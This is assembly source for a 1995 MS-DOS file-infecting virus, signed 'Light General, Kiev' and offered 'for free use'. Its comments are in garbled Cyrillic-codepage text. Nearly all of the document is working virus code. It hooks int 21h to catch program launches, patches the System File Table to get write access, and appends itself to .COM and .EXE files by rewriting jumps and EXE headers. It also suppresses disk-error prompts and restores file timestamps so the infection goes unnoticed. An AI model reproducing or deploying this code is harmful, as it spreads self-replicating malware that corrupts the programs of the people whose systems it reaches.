; <20><><EFBFBD><EFBFBD><EFBFBD> <20>ந<EFBFBD>室<EFBFBD><E5AEA4> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> : <20>.<2E>. <20><><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD> 䠩<><E4A0A9> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 㪠<>뢠<EFBFBD><EBA2A0> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> 䠩<> <20><><EFBFBD><EFBFBD>᪠<EFBFBD><E1AAA0>!
|
|||
|
; (<28><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> ⠪<><E2A0AA> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .EXE 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20>.<2E><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; "<22><><EFBFBD><EFBFBD> <20><>ᥬ<EFBFBD><E1A5AC><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> IBM PC <20> <20>ணࠬ<E0AEA3><E0A0AC><EFBFBD><E0AEA2><EFBFBD><EFBFBD>" (<28><><EFBFBD>. 362)
|
|||
|
L_exe:
|
|||
|
mov ax,es
|
|||
|
add ax,10h
|
|||
|
add cs:[offset CS_file-offset virr][si],ax
|
|||
|
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><E1ABA8> ᥣ<><E1A5A3><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><>।<EFBFBD><E0A5A4><EFBFBD> <20><>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
db 0eah ;-
|
|||
|
IP_file dw ? ;- JMP Far CS_file:IP_file
|
|||
|
CS_file dw ? ;-
|
|||
|
;------------------------------------------------------------------
|
|||
|
; <20> <20><><EFBFBD> ᮡ<>⢥<EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20>⢥<EFBFBD><E2A2A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3>!
|
|||
|
int_21h_entry proc
|
|||
|
cmp ax,0FEFEh ;-<2D> ᮡ<><E1AEA1><EFBFBD> <20><><EFBFBD><EFBFBD>訢<EFBFBD><E8A8A2><EFBFBD> <20> <20><><EFBFBD><EFBFBD>稨
|
|||
|
jnz _@1 ;-<><E1A2AE> த<><E0AEA4> <20><> <20><><EFBFBD><EFBFBD> <20><>㦥᪨<E3A6A5> <20>⢥<EFBFBD>.
|
|||
|
stc ;-
|
|||
|
int_24h_entry:
|
|||
|
mov al,03
|
|||
|
retf 2
|
|||
|
|
|||
|
_@1:
|
|||
|
cmp ax,4b00h ; <20> DOS <20><>⠥<EFBFBD><E2A0A5><EFBFBD> <20>믮<EFBFBD><EBAFAE><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
jnz exit_all ; <20><> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> <20><>!
|
|||
|
jmp infecting ;
|
|||
|
exit_date:
|
|||
|
mov ax,5701h ; <20><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><><EFBFBD>ன <20><><EFBFBD><EFBFBD> 䠩<><E4A0A9>.
|
|||
|
mov cx,es:[di+13] ;<- Time
|
|||
|
mov dx,es:[di+15] ;<- Date
|
|||
|
int 21h
|
|||
|
exit_close:
|
|||
|
mov ah,3eh ; <20><>। <20><>।<EFBFBD>祩 <20><>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> DOS'<27> -
|
|||
|
int 21h ; <20><><EFBFBD><EFBFBD> 䠩<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD>!
|
|||
|
exit_pop:
|
|||
|
lds dx,cs:[offset ofs_24h-offset virr]
|
|||
|
mov ax,2524h ; <20><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> int 24h
|
|||
|
int 21h
|
|||
|
pop bp
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
exit_all:
|
|||
|
db 0eah
|
|||
|
ofs_21h dw 0000
|
|||
|
seg_21h dw 0000
|
|||
|
int_21h_entry endp
|
|||
|
;-------------------------------------------------------------------
|
|||
|
infecting:
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push es
|
|||
|
push ds
|
|||
|
push bp
|
|||
|
push ds
|
|||
|
push dx
|
|||
|
;------------------------------------------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>⠢<EFBFBD><E2A0A2> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 24h <20><> <20><><EFBFBD> <20><>ࠡ<EFBFBD><E0A0A1>稪 - <20>.<2E>. <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>砥 "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><>᪥<EFBFBD><E1AAA5> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS'<27> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; Write protect error ...
|
|||
|
mov al,24h
|
|||
|
mov si,offset ofs_24h-offset virr
|
|||
|
mov dx,offset int_24h_entry-offset virr
|
|||
|
call inst_int
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
;-Open file...-----------------------------------------------------
|
|||
|
mov ax,3d00h
|
|||
|
int 21h
|
|||
|
jc exit_pop
|
|||
|
;-Read header (EXE) or first 4 byte (COM).-------------------------
|
|||
|
mov bh,3fh
|
|||
|
xchg ax,bx
|
|||
|
mov cx,18h
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset origin_2_byte-offset virr
|
|||
|
mov si,dx
|
|||
|
int 21h ; <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0> <20> <20><><EFBFBD><EFBFBD><EFBFBD> 24 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>!
|
|||
|
_1:
|
|||
|
jc exit_close ; <20> <20>訡<EFBFBD><E8A8A1>,<2C><> <20><><EFBFBD><EFBFBD> 䠩<> <20> <20>멤<EFBFBD><EBA9A4>.
|
|||
|
;-Look SFT file!-----------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD>⢥<EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> "<22><><EFBFBD><EEACA8><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> - <20><>-<2D><> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> ⠪<><E2A0AA>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> ࠧ<><E0A0A7><EFBFBD><EFBFBD>!<21> ⠪,<2C><><EFBFBD> <20><> <20><><EFBFBD> :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>쬠 <20><><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><> <20>祭<EFBFBD> <20><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⠪<><E2A0AA><EFBFBD>
|
|||
|
; <20><>⨭<EFBFBD><E2A8AD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>⨥ <20> <20><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><>ਡ<EFBFBD>⮢,<2C><>६<EFBFBD>饭<EFBFBD><E9A5AD> 䠩<><E4A0A9><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 㪠<><E3AAA0>⥫<EFBFBD>!
|
|||
|
; <20> <20><>ᥬ<EFBFBD> <20><><EFBFBD><E1AAAE><EFBFBD> <20> <20><><EFBFBD><EFBFBD>७<EFBFBD><E0A5AD><EFBFBD> <20><><EFBFBD><EFBFBD><E0AEA1><EFBFBD><EFBFBD><EFBFBD> DOS'<27>!
|
|||
|
; (<28><><EFBFBD> 㯮<><E3AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ࠡ<><E0A0A1><EFBFBD> <20>.<2E>.<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⥫<EFBFBD> <20><> <20><><EFBFBD>⥬<EFBFBD><E2A5AC><EFBFBD> <20>㭪<EFBFBD><E3ADAA><EFBFBD><EFBFBD>
|
|||
|
; MS-DOS" (<28><><EFBFBD>. 67) (<28> ⠪ <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEAD><EFBFBD> <20><>ࠢ<EFBFBD>筨<EFBFBD><E7ADA8> Help PC)
|
|||
|
; (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ਬ<EFBFBD><E0A8AC><EFBFBD><EFBFBD><EFBFBD> <20> RC-0-512 (666,Written by Dark Avenger.)
|
|||
|
; <20><><EFBFBD> SFT -- System File Table - (<28><><EFBFBD>⥬<EFBFBD><E2A5AC><EFBFBD> ⠡<><E2A0A1><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9><EFBFBD>.)
|
|||
|
;<3B><><EFBFBD> ᮧ<><E1AEA7><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9> <20> ᮤ<>ন<EFBFBD> <20><><EFBFBD><EFBFBD>ଠ<EFBFBD><E0ACA0><EFBFBD> <20>ᯮ<EFBFBD><E1AFAE><EFBFBD>㥬<EFBFBD><E3A5AC>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD>।<EFBFBD>⢥<EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD>楤<EFBFBD>ࠬ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD> DOS'<27>!!!
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD>饭<EFBFBD><E9A5AD> <20>祩<EFBFBD><E7A5A9> <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>祭<EFBFBD><E7A5AD>
|
|||
|
; <20><>砫<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.(<28><><EFBFBD>.) <20> <20>
|
|||
|
; <20> <20>
|
|||
|
; 00 <20> 1w <20> <20><><EFBFBD>-<2D><> <20><><EFBFBD><EFBFBD>ਯ<EFBFBD><E0A8AF> <20><><EFBFBD>९<EFBFBD><E0A5AF><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> 䠩<><E4A0A9><EFBFBD>
|
|||
|
; 02 <20> 1b <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>㯠 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>⨨
|
|||
|
; 04 <20> 1b <20> <20><>ਡ<EFBFBD><E0A8A1><EFBFBD> 䠩<><E4A0A9>
|
|||
|
; 11 <20> 1w <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ࢮ<EFBFBD><E0A2AE> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|||
|
; 13 <20> 1w <20> <20>६<EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>䨪<EFBFBD>樨 䠩<><E4A0A9>
|
|||
|
; 15 <20> 1w <20> <20><><EFBFBD><EFBFBD> ...
|
|||
|
; 17 <20> 2w <20> <20><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|||
|
; 21 <20> 2w <20> <20><><EFBFBD><EFBFBD><EFBFBD>⥫<EFBFBD> <20> 䠩<><E4A0A9>
|
|||
|
; 32 <20> 11b <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>७<EFBFBD><E0A5AD> 䠩<><E4A0A9> (<28><><EFBFBD> '.')
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ax,1220h ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>祪 <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push bx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> SFT <20> <20><><EFBFBD><EFBFBD> ES:DI
|
|||
|
int 2fh ;
|
|||
|
mov bl,es:[di] ;
|
|||
|
mov ax,1216h ;
|
|||
|
int 2fh ;
|
|||
|
pop bx ;
|
|||
|
mov byte ptr es:[di+2],02 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21>⨬ <20><><EFBFBD><EFBFBD>⢨<EFBFBD><E2A2A8> <20><>
|
|||
|
;ᤥ<><E1A4A5><EFBFBD><EFBFBD> ⠪,<2C><><EFBFBD> ⥯<><E2A5AF><EFBFBD> DOS
|
|||
|
;<3B><><EFBFBD>⠥<EFBFBD>,<2C><><EFBFBD> 䠩<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>!
|
|||
|
; <20>.<2E>. <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;᭨<><E1ADA8><EFBFBD><EFBFBD> <20><>ਡ<EFBFBD><E0A8A1><EFBFBD> 䠩<><E4A0A9>!
|
|||
|
mov bp,es:[di+17] ; BP = file len!
|
|||
|
;---------------------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA2>塞 <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>⠫<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
lodsb
|
|||
|
dec si
|
|||
|
cmp al,'M' ; MZ - <20>ਧ<EFBFBD><E0A8A7><EFBFBD> ⮣<>,<2C><><EFBFBD> <20><><EFBFBD> .EXE 䠩<>!
|
|||
|
jz _EXE
|
|||
|
cmp al,90h ; NOP - <20> <20><><EFBFBD> .COM 䠩<> <20><> <20><EFBFBD>ਬ <20><><EFBFBD> <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><>砫<EFBFBD>)
|
|||
|
_1d:
|
|||
|
jz exit_close
|
|||
|
;-Infect .COM --------------------------------
|
|||
|
; <20><><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> .COM 䠩<><E4A0A9>!
|
|||
|
xchg ax,bp
|
|||
|
cmp ax,65000
|
|||
|
ja exit_close ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>⨬<EFBFBD><E2A8AC>.
|
|||
|
|
|||
|
mov es:[di+21],ax ;<3B>⠢<EFBFBD><E2A0A2> 䠩<><E4A0A9><EFBFBD><EFBFBD><EFBFBD> 㪠<><E3AAA0>⥫<EFBFBD> <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>!
|
|||
|
;-Make JMP------------------------------------
|
|||
|
; <20>.<2E>. <20><><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0> <20> <20><>砫<EFBFBD> .COM 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD>室 <20><> ⥫<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E1ABA8> ᬥ饭<E1ACA5><E9A5AD> <20>⮣<EFBFBD> <20><><EFBFBD><EFBFBD>室<EFBFBD>!
|
|||
|
sub ax,04
|
|||
|
mov ds:[offset jmp_n-offset virr],ax
|
|||
|
call write_virus ; <20><>襬 <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>!
|
|||
|
mov cx,04h ; <20> ⥯<><E2A5AF><EFBFBD> <20><>襬 <20> <20><>砫<EFBFBD> 䠩<><E4A0A9> <20><><EFBFBD> ᠬ<><E1A0AC>
|
|||
|
mov dx,offset new_3_byte-offset virr ; <20><><EFBFBD><EFBFBD>室!
|
|||
|
exit_write:
|
|||
|
mov ah,40h
|
|||
|
int 21h
|
|||
|
_1b: jmp exit_date
|
|||
|
;-Sub. for write virus body (only) in file.----
|
|||
|
write_virus proc
|
|||
|
xor dx,dx
|
|||
|
mov ah,40h
|
|||
|
mov cx,offset ax_len-offset virr
|
|||
|
int 21h
|
|||
|
mov es:[di+21],dx ; F.P = start file!
|
|||
|
mov es:[di+23],dx
|
|||
|
cmp ax,cx
|
|||
|
jnz _1c
|
|||
|
ret
|
|||
|
_1c:
|
|||
|
pop ax
|
|||
|
jmp _1b ; exit_date!
|
|||
|
write_virus endp
|
|||
|
;-Infect .EXE ---------------------------------
|
|||
|
_EXE:
|
|||
|
; <20> ⥯<><E2A5AF><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>⠥<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>, <20><>室<EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>ᠭ<EFBFBD><E1A0AD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; .EXE 䠩<><E4A0A9>! <20> <20> <20><><EFBFBD> <20><> ᮩ<><E1AEA9><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>ᠭ<EFBFBD><E1A0AD> <20> SFT, <20><> <20><> <20><><EFBFBD>⠥<EFBFBD>,<2C><><EFBFBD>
|
|||
|
; <20><><EFBFBD> 䠩<>, ᮤ<>ঠ騩 <20><><EFBFBD><EFA2AD> <20><><EFBFBD><EFBFBD> <20> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> <20><><EFBFBD>!
|
|||
|
mov ax,ds:[si+4] ; Pages (512b).
|
|||
|
dec ax
|
|||
|
mov cx,512
|
|||
|
mul cx
|
|||
|
add ax,[si+2] ; AX = File len from header.
|
|||
|
cmp ax,bp ; Real file len = ax ?
|
|||
|
jnz _1b ; No - this is overlay.
|
|||
|
;-----
|
|||
|
mov es:[di+21],ax ; <20><><EFBFBD><EFBFBD><EFBFBD>⥫<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>.
|
|||
|
mov es:[di+23],dx
|
|||
|
;-Get header.-----------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>ண<EFBFBD> <20><> <20>㤥<EFBFBD> <20><><EFBFBD><EFBFBD>᪠<EFBFBD><E1AAA0> .EXE <20>ணࠬ<E0AEA3><E0A0AC>!
|
|||
|
mov ax,[si+14h]
|
|||
|
mov ds:[offset IP_file-offset virr],ax
|
|||
|
mov ax,[si+16h]
|
|||
|
mov ds:[offset CS_file-offset virr],ax
|
|||
|
;-----------------------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> (<28>.<2E>. <20><><EFBFBD> <20><><EFBFBD><EFBFBD>᪠ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>)
|
|||
|
xchg ax,bp
|
|||
|
mov cx,10h
|
|||
|
div cx
|
|||
|
sub ax,[si+8]
|
|||
|
sbb dx,0
|
|||
|
mov [si+16h],ax ; ReloCS.
|
|||
|
mov [si+14h],dx ; ExeIP.
|
|||
|
;-Correcting file len in header.----------------
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>⪮<EFBFBD>४<EFBFBD><E0A5AA><EFBFBD>㥬 <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .EXE 䠩<><E4A0A9>!
|
|||
|
;(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> = 385 ,<2C> <20><> 㢥<><E3A2A5>稢<EFBFBD><E7A8A2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> <20><> 385 ,<2C> <20><> 512!!!<21>.<2E>. ⥯<><E2A5AF><EFBFBD> <20><>㣨<EFBFBD> "㬭<><E3ACAD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> 䠩<>).<2E><><EFBFBD><EFBFBD>⢥<EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20>ᮡ<EFBFBD><E1AEA1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <><EFA2AB><EFBFBD><EFBFBD><EFBFBD> <20>ਧ<EFBFBD><E0A8A7><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD>,-
|
|||
|
; <20><> <20><><EFBFBD><EFBFBD> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> <20><><EFBFBD><EFBFBD>!
|
|||
|
inc word ptr ds:[si+4]
|
|||
|
;-Write virus to file.--------------------------
|
|||
|
call write_virus
|
|||
|
;-Write new header.-----------------------------
|
|||
|
mov cx,18h
|
|||
|
mov dx,si ; DX = offset header.
|
|||
|
jmp exit_write ; <20><><EFBFBD><EFBFBD><EFBFBD>⮢<EFBFBD><E2AEA2> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>।<EFBFBD><E0A5A4><EFBFBD> <20><>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> <20><>אַ
|
|||
|
;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 21h!
|
|||
|
;----------------------------------------------
|
|||
|
inst_int proc
|
|||
|
mov ah,35h
|
|||
|
int 21h
|
|||
|
mov ds:[si],bx
|
|||
|
mov ds:[si+2],es
|
|||
|
mov ah,25h
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
inst_int endp
|
|||
|
new_3_byte db 90h ; NOP
|
|||
|
db 0e9h ; JMP nn
|
|||
|
jmp_n dw 0000 ; nn
|
|||
|
;-Header for EXE file & buffer for first 5 bytes COM's file.--
|
|||
|
origin_2_byte:
|
|||
|
header:
|
|||
|
db 4 dup (90h) ; NOPs
|
|||
|
ax_len db ?
|
|||
|
db 20h dup (?) ; For EXE header.
|
|||
|
ofs_24h dw ?
|
|||
|
seg_24h dw ?
|
|||
|
;********************************************************
|
|||
|
cseg ends
|
|||
|
end start
|
|||
|
|
|||
|
;-- Written by Light General.Kiev.1995.For free use! ----
|